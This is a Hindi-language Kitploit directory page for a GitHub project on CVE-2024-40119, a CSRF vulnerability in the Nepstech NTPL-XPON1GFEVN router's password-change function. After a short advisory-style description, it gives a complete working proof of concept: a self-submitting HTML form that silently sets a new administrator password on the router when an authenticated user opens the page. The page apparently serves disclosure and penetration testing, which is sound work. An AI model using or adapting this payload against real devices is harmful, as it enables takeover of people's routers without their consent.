Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/baroi-ai/nepstech-xpon-router-cve-2024-40119
IoT सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbaroi-ai/nepstech-xpon-router-cve-2024-40119

nepstech-xpon-router-CVE-2024-40119

पासवर्ड बदलने के फ़ंक्शन में क्रॉस-साइट रिक्वेस्ट फॉरजरी (CSRF) कमज़ोरी, जो दूरस्थ हमलावरों को उपयोगकर्ता की सहमति के बिना एडमिन पासवर्ड बदलने की अनुमति देती है, जिससे संभावित खाता अधिग्रहण हो सकता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1142 साल पहलेअभी तक समीक्षित नहीं

nepstech-xpon-router-CVE-2024-40119

लेखक:

Subhodeep Baroi

CVE-2024-40119: Nepstech Wifi Router NTPL-XPON1GFEVN v1.0 में CSRF भेद्यता

विवरण

CVE-2024-40119 एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता है जो Nepstech Wifi Router xpon NTPL-XPON1GFEVN v1.0 फर्मवेयर v2.0.1 में मौजूद है। यह भेद्यता दूरस्थ हमलावरों को उपयोगकर्ता की सहमति के बिना व्यवस्थापक पासवर्ड बदलने की अनुमति देती है, जिससे संभावित खाता अधिग्रहण होता है।

विस्तार

  • भेद्यता प्रकार: क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
  • उत्पाद का विक्रेता: Nepstech
  • प्रभावित उत्पाद कोड आधार: Wifi Router xpon (टर्मिनल) - मॉडल: NTPL-XPON1GFEVN - संस्करण: 1.0 और फर्मवेयर: V2.0.1
  • प्रभावित घटक: राउटर वेब ऐप पासवर्ड बदलने की कार्यक्षमता
  • हमले का प्रकार: दूरस्थ
  • प्रभाव: व्यवस्थापक खाता अधिग्रहण

हमले के वैक्टर

एक दूरस्थ हमलावर एक दुर्भावनापूर्ण HTML पृष्ठ तैयार कर सकता है जो किसी प्रमाणित उपयोगकर्ता द्वारा देखे जाने पर पासवर्ड बदलने की कार्यक्षमता को ट्रिगर करता है। नीचे एक नमूना हमला वेक्टर है:

root@kitploit:~
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
टूल डाउनलोड करें